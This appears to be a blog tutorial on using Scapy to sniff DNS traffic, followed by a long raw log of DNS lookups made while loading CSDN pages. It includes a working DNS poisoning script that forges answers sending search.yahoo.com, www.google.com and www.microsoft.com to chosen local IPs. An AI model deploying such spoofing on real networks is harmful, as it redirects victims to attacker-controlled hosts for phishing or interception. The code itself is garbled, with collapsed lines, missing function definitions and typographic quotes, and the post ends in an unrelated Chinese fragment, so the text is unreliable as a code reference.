How to parse dns request and response ? Scapy is a powerful tool, and it can help us for dns detail.
#!/usr/bin/env python# -*- coding: utf8 -*-“””execute demo py with root privilege, and finish double dns query as follow.$ nslookup search.yahoo.com$ nslookup github.comdns sniffer will parse dns requests and responses automatically.root:scapy/ # python scapy-dns_sniff.pyWARNING: No route found for IPv6 destination :: (no default route?)[*] request: 192.168.1.108:49771 -> 192.168.1.1:53 : search.yahoo.com.[*] response: 192.168.1.108:49771 <- 192.168.1.1:53 : search.yahoo.com. – ds-global.l7.search.ystg1.b.yahoo.com.[*] response: 192.168.1.108:49771 <- 192.168.1.1:53 : ds-global.l7.search.ystg1.b.yahoo.com. – ds-any-global.l7.search.ysta1.b.yahoo.com.[*] response: 192.168.1.108:49771 <- 192.168.1.1:53 : ds-any-global.l7.search.ysta1.b.yahoo.com. – 188.125.66.104[*] request: 192.168.1.108:40813 -> 192.168.1.1:53 : github.com.[*] response: 192.168.1.108:40813 <- 192.168.1.1:53 : github.com. – 192.30.252.128———————————————-DNS Posioningsimilar to the tool called dnsspoofroot:scapy/ # python scapy-dns_poisoning.pyWARNING: No route found for IPv6 destination :: (no default route?)[*] request: 192.168.1.107:53052 -> 192.168.1.108:53 : search.yahoo.com.[*] response: 192.168.1.107:53052 <- 192.168.1.108:53 : search.yahoo.com. – 192.168.1.107[*] request: 192.168.1.107:55815 -> 192.168.1.108:53 : [*] response: 192.168.1.107:55815 <- 192.168.1.108:53 : – 192.168.1.108[*] request: 192.168.1.107:37993 -> 192.168.1.108:53 : [*] response: 192.168.1.107:37993 <- 192.168.1.108:53 : – 192.168.1.109″””from scapy.all import *# disable verbose modeconf.verb = 0# redirect domain to the special ipposion_table = {‘search.yahoo.com’: ‘192.168.1.107’,’www.google.com’: ‘192.168.1.108’,’www.microsoft.com’: ‘192.168.1.109’}:”””posion dns request,search.yahoo.com and will be 192.168.1.108″””””” parse dns request / response packet “””if pkt and pkt.haslayer(‘UDP’) and pkt.haslayer(‘DNS’):ip = pkt[‘IP’]udp = pkt[‘UDP’]dns = pkt[‘DNS’]# dns query packetif int(udp.dport) == 53:qname = dns.qd.qnamedomain = qname[:-1]print “\n[*] request: %s:%d -> %s:%d : %s” % (ip.src, udp.sport, ip.dst, udp.dport, qname)# match posion domain (demo, maybe not explicit)if domain.lower() in (posion_table.keys()):posion_ip = posion_table[domain]# send a response packet to (dns request src host)pkt_ip = IP(src=ip.dst,dst=ip.src)pkt_udp = UDP(sport=udp.dport, dport=udp.sport)# if id is 0 (default value) ;; Warning: ID mismatchpkt_dns = DNS(id=dns.id,qr=1,qd=dns.qd,an=DNSRR(rrname=qname, rdata=posion_ip))print “[*] response: %s:%s <- %s:%d : %s – %s” % (pkt_ip.dst, pkt_udp.dport,pkt_ip.src, pkt_udp.sport,pkt_dns[‘DNS’].an.rrname,pkt_dns[‘DNS’].an.rdata)send(pkt_ip/pkt_udp/pkt_dns):””” parse dns request / response packet “””if pkt and pkt.haslayer(‘UDP’) and pkt.haslayer(‘DNS’):ip = pkt[‘IP’]udp = pkt[‘UDP’]dns = pkt[‘DNS’]# dns query packetif int(udp.dport) == 53:qname = dns.qd.qnameprint “\n[*] request: %s:%d -> %s:%d : %s” % (ip.src, udp.sport, ip.dst, udp.dport, qname)# dns reply packetelif int(udp.sport) == 53:# dns DNSRR count (answer count)for i in range(dns.ancount):dnsrr = dns.an[i]print “[*] response: %s:%s <- %s:%d : %s – %s” % (ip.dst, udp.dport,ip.src, udp.sport,dnsrr.rrname, dnsrr.rdata):sniff(filter=”udp port 53″, prn=dns_posion)if __name__ == “__main__”:main()
You can get more details, when you open blog.csdn.net. So many noisy dns requests have been sent.
root:scapy/ # python scapy-dns_sniff.py WARNING: No route found for IPv6 destination :: (no default route?)[*] request: ::53 : c.csdnimg.cn.[*] request: ::.[*] request: ::.[*] request: ::.[*] response: ::. – creatim.[*] response: ::. – opt.[*] response: ::. – [*] response: ::. – [*] request: ::.[*] request: ::53 : c.csdnimg.cn.[*] response: ::. – static.[*] request: ::53 : blog.csdn.net.[*] request: ::53 : blog.csdn.net.[*] response: ::. – creatim.[*] response: ::. – opt.[*] request: ::53 : blog.csdn.net.[*] request: ::53 : static.csdn.net.[*] response: ::.[*] response: ::. – [*] response: ::. – [*] response: ::. – static.[*] response: ::. – [*] response: ::. – [*] request: ::53 : csdnimg.cn.[*] request: ::53 : csdnimg.cn.[*] response: ::.[*] response: ::[*] request: ::53 : csdnim.allyes.com.[*] request: ::53 : csdnim.allyes.com.[*] response: ::[*] response: ::[*] response: ::.[*] response: ::. – [*] response: ::. – [*] request: ::53 : static.csdn.net.[*] response: ::.[*] response: ::. – [*] response: ::. – [*] response: ::.[*] request: ::53 : www.google-analytics.com.[*] request: ::53 : www.google-analytics.com.[*] response: ::.[*] response: ::. – 2404:6800:4005:80b::200e[*] response: ::.[*] response: ::. – [*] response: ::. – [*] response: ::. – [*] response: ::. – [*] response: ::. – [*] response: ::. – [*] response: ::. – [*] response: ::. – [*] response: ::. – [*] response: ::. – [*] response: ::. – [*] request: ::.[*] request: ::.[*] response: ::. – baecdn.baidu.com.[*] response: ::.[*] response: ::[*] response: ::. – baecdn.baidu.com.[*] response: ::.[*] request: ::53 : message.csdn.net.[*] request: ::53 : message.csdn.net.[*] response: ::[*] response: ::.[*] request: ::53 : dc.csdn.net.[*] response: ::[*] request: ::53 : dc.csdn.net.[*] request: ::53 : apps.bdimg.com.[*] request: ::53 : apps.bdimg.com.[*] response: ::.[*] response: ::. – [*] response: ::.[*] request: ::53 : avatar.csdn.net.[*] request: ::53 : avatar.csdn.net.[*] response: ::[*] request: ::53 : pagead2.googlesyndication.com.[*] response: ::.[*] response: ::. – [*] response: ::. – [*] response: ::. – [*] request: ::53 : pagead2.googlesyndication.com.[*] response: ::.[*] response: ::. – 2404:6800:4005:80a::2002[*] request: ::53 : a.yunshipei.com.[*] request: ::53 : a.yunshipei.com.[*] request: ::53 : passport.csdn.net.[*] request: ::53 : passport.csdn.net.[*] response: ::.[*] response: ::. – blob.[*] response: ::[*] response: ::.[*] response: ::. – blob.[*] response: ::. – [*] request: ::.[*] response: ::. – old-my.qiniudn.com.[*] response: ::.[*] response: ::. – qiniunor.[*] response: ::. – [*] response: ::. – [*] request: ::.[*] response: ::. – old-my.qiniudn.com.[*] response: ::.[*] response: ::. – qiniunor.[*] request: ::53 : csdnimg.cn.[*] response: ::[*] request: ::53 : dc2.csdn.net.[*] request: ::53 : dc2.csdn.net.[*] response: ::[*] response: ::[*] request: ::53 : dc2.csdn.net.[*] request: ::53 : www.google-analytics.com.[*] response: ::.[*] response: ::. – [*] response: ::. – [*] response: ::. – [*] response: ::. – [*] response: ::. – [*] response: ::. – [*] response: ::. – [*] response: ::. – [*] response: ::. – [*] response: ::. – [*] response: ::. – [*] request: ::53 : cpro.baidustatic.com.[*] request: ::53 : cpro.baidustatic.com.[*] response: ::.[*] response: ::[*] request: ::53 : cpro.baidustatic.com.[*] response: ::.[*] response: ::[*] response: ::.[*] request: ::53 : pos.baidu.com.[*] request: ::53 : pos.baidu.com.[*] request: ::53 : pos.baidu.com.[*] response: ::.[*] response: ::.[*] response: ::. – [*] response: ::.[*] response: ::. – [*] request: ::.[*] request: ::.[*] request: ::.[*] response: ::. – pagead46.[*] response: ::. – [*] response: ::. – [*] response: ::. – [*] response: ::. – pagead46.[*] response: ::. – [*] response: ::. – [*] response: ::. – [*] response: ::. – pagead46.[*] response: ::. – 2404:6800:4005:80a::2002[*] request: ::53 : cpro.baidu.com.[*] request: ::53 : cpro.baidu.com.[*] request: ::53 : cpro.baidu.com.[*] request: ::.[*] request: ::.[*] request: ::.[*] response: ::.[*] response: ::. – [*] response: ::.[*] response: ::. – wn.[*] response: ::. – [*] response: ::.[*] response: ::. – [*] response: ::. – wn.[*] response: ::. – wn.[*] response: ::. – [*] request: ::53 : ubmcmm.baidustatic.com.[*] request: ::53 : ubmcmm.baidustatic.com.[*] request: ::53 : ubmcmm.baidustatic.com.[*] response: ::.[*] response: ::[*] response: ::.[*] response: ::[*] response: ::.[*] request: ::53 : cpro2.baidustatic.com.[*] request: ::53 : cpro2.baidustatic.com.[*] response: ::.[*] response: ::[*] response: ::.[*] request: ::53 : static.googleadsserving.cn.[*] request: ::53 : static.googleadsserving.cn.[*] request: ::53 : static.googleadsserving.cn.[*] response: ::.[*] response: ::. – [*] response: ::. – [*] response: ::. – [*] response: ::.[*] response: ::. – [*] response: ::. – [*] response: ::. – [*] response: ::.[*] response: ::. – 2404:6800:4005:808::2002[*] request: ::.[*] request: ::.[*] request: ::.[*] response: ::. – pagead.[*] response: ::. – pagead.[*] response: ::. – [*] response: ::. – [*] response: ::. – [*] response: ::. – pagead.[*] response: ::. – [*] response: ::. – [*] response: ::. – [*] request: ::53 : counter.csdn.net.[*] request: ::53 : counter.csdn.net.[*] request: ::53 : counter.csdn.net.[*] response: ::[*] response: ::[*] request: ::53 : s10-im-notify.csdn.net.[*] request: ::53 : s10-im-notify.csdn.net.[*] response: ::[*] request: ::53 : ask.csdn.net.[*] request: ::53 : ask.csdn.net.[*] request: ::53 : ask.csdn.net.[*] response: ::[*] response: ::[*] request: ::53 : m.baidu.com.[*] request: ::53 : m.baidu.com.[*] response: ::.[*] response: ::.[*] response: ::. – [*] request: ::53 : openapi.baidu.com.[*] response: ::.[*] response: ::. – [*] request: ::53 : openapi.baidu.com.[*] response: ::.[*] request: ::53 : dup.baidustatic.com.[*] request: ::53 : dup.baidustatic.com.[*] response: ::.[*] response: ::[*] response: ::.[*] request: ::.[*] request: ::.[*] response: ::. – e.[*] response: ::. – e.[*] response: ::. – [*] request: ::53 : www.csdn.net.[*] request: ::53 : geek.csdn.net.[*] request: ::.[*] request: ::.[*] response: ::. – [*] response: ::[*] request: ::53 : geek.csdn.net.[*] response: ::[*] request: ::53 : www.csdn.net.[*] request: ::53 : bbs.csdn.net.[*] request: ::53 : bbs.csdn.net.[*] response: ::[*] request: ::.[*] request: ::.[*] response: ::. – [*] request: ::53 : code.csdn.net.[*] request: ::53 : my.csdn.net.[*] request: ::53 : my.csdn.net.[*] response: ::[*] request: ::53 : code.csdn.net.[*] response: ::[*] request: ::53 : download.csdn.net.[*] request: ::53 : download.csdn.net.[*] response: ::[*] request: ::53 : hero.csdn.net.[*] request: ::53 : hero.csdn.net.[*] request: ::53 : job.csdn.net.[*] response: ::[*] response: ::[*] request: ::53 : job.csdn.net.[*] request: ::53 : edu.csdn.net.[*] request: ::53 : edu.csdn.net.[*] response: ::[*] request: ::53 : huiyi.csdn.net.[*] response: ::[*] request: ::53 : huiyi.csdn.net.[*] request: ::53 : www.csto.com.[*] request: ::53 : www.csto.com.[*] request: ::53 : mall.csdn.net.[*] request: ::53 : mall.csdn.net.[*] response: ::[*] response: ::[*] request: ::53 : cto.csdn.net.[*] request: ::53 : cto.csdn.net.[*] response: ::[*] request: ::53 : student.csdn.net.[*] response: ::[*] request: ::53 : student.csdn.net.[*] request: ::.[*] request: ::.[*] response: ::. – [*] request: ::53 : surveies.csdn.net.[*] request: ::53 : wangmeng.baidu.com.[*] request: ::53 : wangmeng.baidu.com.[*] response: ::.[*] response: ::. – [*] response: ::. – [*] response: ::.[*] request: ::53 : www.baidu.com.[*] request: ::53 : www.baidu.com.[*] response: ::.[*] response: ::.[*] response: ::. – [*] response: ::. – [*] request: ::53 : www.google.com.[*] request: ::53 : www.google.com.[*] response: ::[*] response: ::[*] response: ::[*] response: ::[*] response: ::[*] response: ::[*] response: ::53 : www.google.com. – 2404:6800:4008:c01::69[*] response: ::[*] request: ::53 : surveies.csdn.net.[*] request: ::53 : eclick.baidu.com.[*] request: ::53 : eclick.baidu.com.[*] response: ::.[*] response: ::. – [*] response: ::.[*] response: ::. – [*] request: ::53 : eclick.baidu.com.[*] response: ::.
Please dig yourself.
,自己喜欢的人,那就随便怎么样了,
